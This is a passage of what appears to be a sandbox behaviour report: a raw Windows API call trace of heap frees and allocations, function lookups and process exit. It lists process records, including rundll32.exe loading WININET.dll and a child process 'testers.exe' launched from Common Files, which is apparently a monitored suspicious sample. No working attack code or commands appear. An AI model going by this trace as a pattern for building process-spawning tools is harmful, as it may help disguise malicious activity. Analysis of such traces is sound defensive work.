hHeap=0xc60000) returned 1 [0265.414] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79280 | out: hHeap=0xc60000) returned 1 [0265.414] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd792b0 | out: hHeap=0xc60000) returned 1 [0265.414] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd792c8 | out: hHeap=0xc60000) returned 1 [0265.414] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd792e0 | out: hHeap=0xc60000) returned 1 [0265.414] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd69608 | out: hHeap=0xc60000) returned 1 [0265.414] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78dd0 | out: hHeap=0xc60000) returned 1 [0265.414] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78ab8 | out: hHeap=0xc60000) returned 1 [0265.414] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd695b8 | out: hHeap=0xc60000) returned 1 [0265.414] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78650 | out: hHeap=0xc60000) returned 1 [0265.414] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78aa0 | out: hHeap=0xc60000) returned 1 [0265.414] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd69568 | out: hHeap=0xc60000) returned 1 [0265.414] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd758a0 | out: hHeap=0xc60000) returned 1 [0265.414] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd791f0 | out: hHeap=0xc60000) returned 1 [0265.414] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd791d8 | out: hHeap=0xc60000) returned 1 [0265.414] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79208 | out: hHeap=0xc60000) returned 1 [0265.414] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79220 | out: hHeap=0xc60000) returned 1 [0265.414] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd69590 | out: hHeap=0xc60000) returned 1 [0265.414] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd694f0 | out: hHeap=0xc60000) returned 1 [0265.414] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75870 | out: hHeap=0xc60000) returned 1 [0265.414] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79130 | out: hHeap=0xc60000) returned 1 [0265.414] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79118 | out: hHeap=0xc60000) returned 1 [0265.414] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79148 | out: hHeap=0xc60000) returned 1 [0265.414] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78ad0 | out: hHeap=0xc60000) returned 1 [0265.414] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75880 | out: hHeap=0xc60000) returned 1 [0265.415] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79178 | out: hHeap=0xc60000) returned 1 [0265.415] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79160 | out: hHeap=0xc60000) returned 1 [0265.415] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd69540 | out: hHeap=0xc60000) returned 1 [0265.415] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75890 | out: hHeap=0xc60000) returned 1 [0265.415] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd791a8 | out: hHeap=0xc60000) returned 1 [0265.415] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79190 | out: hHeap=0xc60000) returned 1 [0265.415] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd791c0 | out: hHeap=0xc60000) returned 1 [0265.415] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd69518 | out: hHeap=0xc60000) returned 1 [0265.415] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd786c8 | out: hHeap=0xc60000) returned 1 [0265.415] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75840 | out: hHeap=0xc60000) returned 1 [0265.415] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79058 | out: hHeap=0xc60000) returned 1 [0265.415] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79040 | out: hHeap=0xc60000) returned 1 [0265.415] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78a88 | out: hHeap=0xc60000) returned 1 [0265.415] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75850 | out: hHeap=0xc60000) returned 1 [0265.415] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79088 | out: hHeap=0xc60000) returned 1 [0265.415] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79070 | out: hHeap=0xc60000) returned 1 [0265.415] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd790a0 | out: hHeap=0xc60000) returned 1 [0265.415] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78b30 | out: hHeap=0xc60000) returned 1 [0265.415] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75860 | out: hHeap=0xc60000) returned 1 [0265.415] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd790d0 | out: hHeap=0xc60000) returned 1 [0265.415] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd790b8 | out: hHeap=0xc60000) returned 1 [0265.415] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd790e8 | out: hHeap=0xc60000) returned 1 [0265.415] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79100 | out: hHeap=0xc60000) returned 1 [0265.415] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd694c8 | out: hHeap=0xc60000) returned 1 [0265.415] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78b48 | out: hHeap=0xc60000) returned 1 [0265.416] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75800 | out: hHeap=0xc60000) returned 1 [0265.416] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78f38 | out: hHeap=0xc60000) returned 1 [0265.416] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78f20 | out: hHeap=0xc60000) returned 1 [0265.416] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7e5c0 | out: hHeap=0xc60000) returned 1 [0265.416] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75810 | out: hHeap=0xc60000) returned 1 [0265.416] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78f68 | out: hHeap=0xc60000) returned 1 [0265.416] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78f50 | out: hHeap=0xc60000) returned 1 [0265.416] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78f80 | out: hHeap=0xc60000) returned 1 [0265.416] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd694a0 | out: hHeap=0xc60000) returned 1 [0265.416] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75820 | out: hHeap=0xc60000) returned 1 [0265.416] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78fb0 | out: hHeap=0xc60000) returned 1 [0265.416] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78f98 | out: hHeap=0xc60000) returned 1 [0265.416] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78fc8 | out: hHeap=0xc60000) returned 1 [0265.416] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xce3678 | out: hHeap=0xc60000) returned 1 [0265.416] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75830 | out: hHeap=0xc60000) returned 1 [0265.416] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78ff8 | out: hHeap=0xc60000) returned 1 [0265.416] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78fe0 | out: hHeap=0xc60000) returned 1 [0265.416] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79010 | out: hHeap=0xc60000) returned 1 [0265.416] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79028 | out: hHeap=0xc60000) returned 1 [0265.416] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd69478 | out: hHeap=0xc60000) returned 1 [0265.416] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78668 | out: hHeap=0xc60000) returned 1 [0265.416] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd757c0 | out: hHeap=0xc60000) returned 1 [0265.416] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78e00 | out: hHeap=0xc60000) returned 1 [0265.416] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78de8 | out: hHeap=0xc60000) returned 1 [0265.416] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7e588 | out: hHeap=0xc60000) returned 1 [0265.416] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd757d0 | out: hHeap=0xc60000) returned 1 [0265.416] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78e30 | out: hHeap=0xc60000) returned 1 [0265.416] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78e18 | out: hHeap=0xc60000) returned 1 [0265.416] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78e48 | out: hHeap=0xc60000) returned 1 [0265.417] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd69428 | out: hHeap=0xc60000) returned 1 [0265.417] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd757e0 | out: hHeap=0xc60000) returned 1 [0265.417] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78e78 | out: hHeap=0xc60000) returned 1 [0265.417] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78e60 | out: hHeap=0xc60000) returned 1 [0265.417] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78e90 | out: hHeap=0xc60000) returned 1 [0265.417] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7e5f8 | out: hHeap=0xc60000) returned 1 [0265.417] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd757f0 | out: hHeap=0xc60000) returned 1 [0265.417] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78ec0 | out: hHeap=0xc60000) returned 1 [0265.417] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78ea8 | out: hHeap=0xc60000) returned 1 [0265.417] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78ed8 | out: hHeap=0xc60000) returned 1 [0265.417] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78ef0 | out: hHeap=0xc60000) returned 1 [0265.417] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd69450 | out: hHeap=0xc60000) returned 1 [0265.417] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78b18 | out: hHeap=0xc60000) returned 1 [0265.418] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75780 | out: hHeap=0xc60000) returned 1 [0265.418] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd786e0 | out: hHeap=0xc60000) returned 1 [0265.418] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78740 | out: hHeap=0xc60000) returned 1 [0265.418] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7e550 | out: hHeap=0xc60000) returned 1 [0265.418] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75790 | out: hHeap=0xc60000) returned 1 [0265.418] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78cf8 | out: hHeap=0xc60000) returned 1 [0265.418] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78ce0 | out: hHeap=0xc60000) returned 1 [0265.418] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78d10 | out: hHeap=0xc60000) returned 1 [0265.418] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd693d8 | out: hHeap=0xc60000) returned 1 [0265.418] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd757a0 | out: hHeap=0xc60000) returned 1 [0265.418] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78d40 | out: hHeap=0xc60000) returned 1 [0265.418] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78d28 | out: hHeap=0xc60000) returned 1 [0265.418] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78d58 | out: hHeap=0xc60000) returned 1 [0265.418] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78698 | out: hHeap=0xc60000) returned 1 [0265.418] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd757b0 | out: hHeap=0xc60000) returned 1 [0265.418] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78d88 | out: hHeap=0xc60000) returned 1 [0265.418] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78d70 | out: hHeap=0xc60000) returned 1 [0265.418] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78da0 | out: hHeap=0xc60000) returned 1 [0265.418] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78db8 | out: hHeap=0xc60000) returned 1 [0265.418] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd69400 | out: hHeap=0xc60000) returned 1 [0265.418] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78710 | out: hHeap=0xc60000) returned 1 [0265.418] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75740 | out: hHeap=0xc60000) returned 1 [0265.418] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78b78 | out: hHeap=0xc60000) returned 1 [0265.418] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78b60 | out: hHeap=0xc60000) returned 1 [0265.418] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78728 | out: hHeap=0xc60000) returned 1 [0265.418] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75750 | out: hHeap=0xc60000) returned 1 [0265.418] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78ba8 | out: hHeap=0xc60000) returned 1 [0265.418] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78b90 | out: hHeap=0xc60000) returned 1 [0265.419] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78bc0 | out: hHeap=0xc60000) returned 1 [0265.419] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78a70 | out: hHeap=0xc60000) returned 1 [0265.419] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75760 | out: hHeap=0xc60000) returned 1 [0265.419] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78bf0 | out: hHeap=0xc60000) returned 1 [0265.419] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78bd8 | out: hHeap=0xc60000) returned 1 [0265.419] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78c08 | out: hHeap=0xc60000) returned 1 [0265.419] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd693b0 | out: hHeap=0xc60000) returned 1 [0265.419] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75770 | out: hHeap=0xc60000) returned 1 [0265.419] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78c38 | out: hHeap=0xc60000) returned 1 [0265.419] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78c20 | out: hHeap=0xc60000) returned 1 [0265.419] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78c50 | out: hHeap=0xc60000) returned 1 [0265.423] SetCurrentDirectoryW (lpPathName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 1 [0265.429] mciSendStringW (in: lpstrCommand="close all", lpstrReturnString=0x0, uReturnLength=0x0, hwndCallback=0x0 | out: lpstrReturnString=0x0) returned 0x0 [0265.430] OleUninitialize () [0265.432] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x93fdf4 | out: phModule=0x93fdf4) returned 0 [0265.432] ExitProcess (uExitCode=0x0) Thread: id = 281 os_tid = 0x2b0 Thread: id = 282 os_tid = 0x24c Thread: id = 284 os_tid = 0x7fc Thread: id = 285 os_tid = 0x7c8 Thread: id = 286 os_tid = 0x6b0 Thread: id = 287 os_tid = 0x64 Thread: id = 288 os_tid = 0xb0 Thread: id = 291 os_tid = 0x4dc Process: id = "40" image_name = "rundll32.exe" filename = "c:\\windows\\syswow64\\rundll32.exe" page_root = "0x5f171000" os_pid = "0x7bc" os_integrity_level = "0x1000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "39" os_parent_pid = "0x670" cmd_line = "\"C:\\Windows\\system32\\rundll32.exe\" \"C:\\Windows\\syswow64\\WININET.dll\",DispatchAPICall 1 " cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e39d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 283 os_tid = 0x438 Thread: id = 289 os_tid = 0x46c Thread: id = 290 os_tid = 0x150 Thread: id = 292 os_tid = 0x260 Thread: id = 293 os_tid = 0x184 Thread: id = 294 os_tid = 0x5e0 Process: id = "41" image_name = "testers.exe" filename = "c:\\progra~2\\common~1\\testers.exe" page_root = "0x5e274000" os_pid = "0xe0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "39" os_parent_pid = "0x670" cmd_line = "C:\\PROGRA~2\\COMMON~1\\testers.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e39d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 297 os_tid = 0xe4 [0265.692] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x77fa98 | out: lpSystemTimeAsFileTime=0x77fa98*(dwLowDateTime=0x3fc3a820, dwHighDateTime=0x1d661be)) [0265.692] GetCurrentThreadId () returned 0xe4 [0265.692] GetCurrentProcessId () returned 0xe0 [0265.692] QueryPerformanceCounter (in: lpPerformanceCount=0x77fa90 | out: lpPerformanceCount=0x77fa90*=19621662564) returned 1 [0265.721] GetStartupInfoW (in: lpStartupInfo=0x77fa28 | out: lpStartupInfo=0x77fa28*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\PROGRA~2\\COMMON~1\\testers.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x7737fd35, hStdError=0x773e7daf)) [0265.721] GetProcessHeap () returned 0xb80000 [0265.724] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75990000 [0265.724] GetProcAddress (hModule=0x75990000, lpProcName="FlsAlloc") returned 0x759a4f2b [0265.724] GetProcAddress (hModule=0x75990000, lpProcName="FlsFree") returned 0x759a359f [0265.724] GetProcAddress (hModule=0x75990000, lpProcName="FlsGetValue") returned 0x759a1252 [0265.725] GetProcAddress (hModule=0x75990000, lpProcName="FlsSetValue") returned 0x759a4208 [0265.725] GetProcAddress (hModule=0x75990000, lpProcName="InitializeCriticalSectionEx") returned 0x759a4d28 [0265.725] GetProcAddress (hModule=0x75990000, lpProcName="CreateEventExW") returned 0x75a2410b [0265.725] GetProcAddress (hModule=0x75990000, lpProcName="CreateSemaphoreExW") returned 0x75a24195 [0265.726] GetProcAddress (hModule=0x75990000, lpProcName="SetThreadStackGuarantee") returned 0x759ad31f [0265.726] GetProcAddress (hModule=0x75990000, lpProcName="CreateThreadpoolTimer") returned 0x759bee7e [0265.726] GetProcAddress (hModule=0x75990000, lpProcName="SetThreadpoolTimer") returned 0x773a441c [0265.726] GetProcAddress (hModule=0x75990000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x773cc50e [0265.726] GetProcAddress (hModule=0x75990000, lpProcName="CloseThreadpoolTimer") returned 0x773cc381 [0265.726] GetProcAddress (hModule=0x75990000, lpProcName="CreateThreadpoolWait") returned 0x759bf088 [0265.726] GetProcAddress (hModule=0x75990000, lpProcName="SetThreadpoolWait") returned 0x773b05d7 [0265.727] GetProcAddress (hModule=0x75990000, lpProcName="CloseThreadpoolWait") returned 0x773cca24 [0265.727] GetProcAddress (hModule=0x75990000, lpProcName="FlushProcessWriteBuffers") returned 0x77380b8c [0265.727] GetProcAddress (hModule=0x75990000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7743fde8 [0265.727] GetProcAddress (hModule=0x75990000, lpProcName="GetCurrentProcessorNumber") returned 0x773d1e1d [0265.727] GetProcAddress (hModule=0x75990000, lpProcName="GetLogicalProcessorInformation") returned 0x75a24761 [0265.727] GetProcAddress (hModule=0x75990000, lpProcName="CreateSymbolicLinkW") returned 0x75a1cd11 [0265.728] GetProcAddress (hModule=0x75990000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0265.728] GetProcAddress (hModule=0x75990000, lpProcName="EnumSystemLocalesEx") returned 0x75a2424f [0265.728] GetProcAddress (hModule=0x75990000, lpProcName="CompareStringEx") returned 0x75a246b1 [0265.728] GetProcAddress (hModule=0x75990000, lpProcName="GetDateFormatEx") returned 0x75a36676 [0265.728] GetProcAddress (hModule=0x75990000, lpProcName="GetLocaleInfoEx") returned 0x75a24751 [0265.728] GetProcAddress (hModule=0x75990000, lpProcName="GetTimeFormatEx") returned 0x75a365f1 [0265.728] GetProcAddress (hModule=0x75990000, lpProcName="GetUserDefaultLocaleName") returned 0x75a247c1 [0265.729] GetProcAddress (hModule=0x75990000, lpProcName="IsValidLocaleName") returned 0x75a247e1 [0265.729] GetProcAddress (hModule=0x75990000, lpProcName="LCMapStringEx") returned 0x75a247f1 [0265.729] GetProcAddress (hModule=0x75990000, lpProcName="GetCurrentPackageId") returned 0x0 [0265.729] GetProcAddress (hModule=0x75990000, lpProcName="GetTickCount64") returned 0x759beee0 [0265.729] GetProcAddress (hModule=0x75990000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0265.729] GetProcAddress (hModule=0x75990000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0265.730] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x8, Size=0x3bc) returned 0xba1f08 [0265.730] GetCurrentThreadId () returned 0xe4 [0265.730] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x18) returned 0xb92a08 [0265.730] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x8, Size=0x800) returned 0xba22d0 [0265.730] GetStartupInfoW (in: lpStartupInfo=0x77f9f8 | out: lpStartupInfo=0x77f9f8*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\PROGRA~2\\COMMON~1\\testers.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x2b9d0d, hStdOutput=0xaf9f0606, hStdError=0x0)) [0265.730] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0265.730] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0265.730] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0265.730] GetCommandLineW () returned="C:\\PROGRA~2\\COMMON~1\\testers.exe" [0265.732] GetEnvironmentStringsW () returned 0xba2ad8* [0265.733] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xaca) returned 0xba35b0 [0265.733] FreeEnvironmentStringsW (penv=0xba2ad8) returned 1 [0265.733] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x354ba8, nSize=0x104 | out: lpFilename="C:\\PROGRA~2\\COMMON~1\\testers.exe" (normalized: "c:\\progra~2\\common~1\\testers.exe")) returned 0x20 [0265.733] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4a) returned 0xb92a28 [0265.733] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x8, Size=0x98) returned 0xba2ad8 [0265.733] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x8, Size=0x3e) returned 0xb92120 [0265.733] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x8, Size=0x6c) returned 0xba2b78 [0265.733] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x8, Size=0x6e) returned 0xba2bf0 [0265.733] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x8, Size=0x78) returned 0xb8f860 [0265.733] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x8, Size=0x62) returned 0xba2c68 [0265.733] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x8, Size=0x2e) returned 0xb9c588 [0265.733] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x8, Size=0x48) returned 0xb981a0 [0265.733] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x8, Size=0x28) returned 0xb9bfe0 [0265.733] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x8, Size=0x1a) returned 0xb9fb20 [0265.733] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x8, Size=0x4a) returned 0xba2cd8 [0265.733] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x8, Size=0x72) returned 0xb8f8e0 [0265.733] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x8, Size=0x30) returned 0xb9c5c0 [0265.734] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x8, Size=0x2e) returned 0xb9c5f8 [0265.734] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x8, Size=0x1c) returned 0xb9fb48 [0265.734] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x8, Size=0xd2) returned 0xba2d30 [0265.734] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x8, Size=0x7c) returned 0xba2e10 [0265.734] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x8, Size=0x36) returned 0xba2e98 [0265.734] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x8, Size=0x3a) returned 0xb92168 [0265.734] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x8, Size=0x90) returned 0xba2ed8 [0265.734] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x8, Size=0x24) returned 0xb9c010 [0265.734] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x8, Size=0x30) returned 0xb9c630 [0265.734] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x8, Size=0x36) returned 0xba2f70 [0265.734] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x8, Size=0x48) returned 0xb981f0 [0265.734] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x8, Size=0x52) returned 0xba2fb0 [0265.734] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x8, Size=0x3c) returned 0xb921b0 [0265.734] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x8, Size=0x82) returned 0xba3010 [0265.734] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x8, Size=0x2e) returned 0xb9c668 [0265.734] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x8, Size=0x1e) returned 0xb9fb70 [0265.734] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x8, Size=0x2c) returned 0xb9c6a0 [0265.734] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x8, Size=0x54) returned 